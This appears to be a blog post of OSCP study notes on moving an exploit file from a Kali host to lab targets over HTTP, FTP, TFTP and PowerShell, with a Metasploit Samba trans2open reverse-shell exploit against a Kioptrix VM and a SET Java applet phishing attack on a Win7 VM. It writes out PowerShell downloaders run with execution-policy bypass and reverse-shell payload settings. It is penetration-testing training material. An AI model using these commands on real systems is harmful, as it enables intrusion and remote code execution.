• OSCP Security Technology


    OSCP Security Technology - File Transfers(1)

    File Transfers
    • HTTP
    • wget
    • FTP
    • TFTP
    • Powershell
    • Metasploit

    Browse the following Link:

    http://192.168.1.14/exploit.php
    

    image-20210905195530721

    wget
    wget http://192.168.1.14/exploit.php
    

    image-20210905195957599

    FTP

    Install and start ftp service on Kali Linux.

    sudo apt-get install python3-pyftpdlib
    cd /var/www/html
    python3 -m pyftpdlib -p 21
    

    image-20210905201103367

    Get exploit.php on windows PC.

    ftp 192.168.1.14
    binary
    get exploit.php
    

    image-20210905201755854

    echo open 192.168.1.14 > ftp.txt
    echo anonymous>> ftp.txt
    echo pass>> ftp.txt
    echo binary >> ftp.txt
    echo exploit.php >> ftp.txt
    echo bye >> ftp.txt
    

    image-20210905204011712

    msfconsole
    msfconsole
    use auxiliary/server/ftp
    show options
    exploit
    

    image-20210905204538216

    TFTP

    Start tftp service on Kali Linux

    atftpd --daemon --port 69 /var/www/html
    

    image-20210905205322474

    Get the file on windows pc.

    echo $storage = $pwd > get.ps1
    echo $webclient = New-object System.Net.Webclient >> get.ps1
    echo $url = "http://192.168.1.14/exploit.php" >> get.ps1
    echo $file = "exploit.php" >> get.ps1
    echo $webclient.DownloadFile($url,$file) >> get.ps1
    
    powershell.exe -Execution Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
    

    image-20210905210349589

    echo $storage = $pwd > get.ps1&echo $webclient = New-object System.Net.Webclient >> get.ps1&echo $url = "http://192.168.1.14/exploit.php" >> get.ps1&echo $file = "exploit.php" >> get.ps1&echo $webclient.DownloadFile($url,$file) >> get.ps1
    
    Msfconsole

    Target: Kioptrix Level 1 VM

    msfconsole
    search trans2open
    use exploit/linux/samba/trans2open
    set RHOST 192.168.1.22
    set payload generic/shell_reverse_tcp
    show options
    exploit
    

    image-20210905220421187

    image-20210905220457633

    Exploiting

    help
    wget http://192.168.1.14/exploit.php
    ls
    pwd
    

    image-20210905220737785

    SET

    Target: Win7 VM

    setoolkit
    
    --> 1) Social-Engineering Attacks
    --> 2) Website Attack Vectors
    --> 1) Java Applet Attack Method
    --> 2) Site Cloner
    
    

    image-20210905223515957

    Generate payload.

    image-20210905233640588

    Browse the site from windows.

    image-20210905234910441

    Error occurred...

    image-20210905235210277

    Continue next time...

    Note (pyinjector.binary):

    https://gitlab.com/kalilinux/packages/set/-/blob/d9fd94cbe53940381de66e506a233c33cfb38c8a/src/payloads/set_payloads/pyinjector.binary

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    centos7下查看端口是否被占用
    centos7通过yum安装redis
    centos7下mysql远程连接
    centos7通过yum安装JDK1.8
    Jwt系列2:使用
    Jwt系列1:简介
    Python基础语法
    排序
    利用MultipartFile来进行文件上传
    服务器端跳转和客户端跳转
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/15232011.html
Copyright © 2020-2023  润新知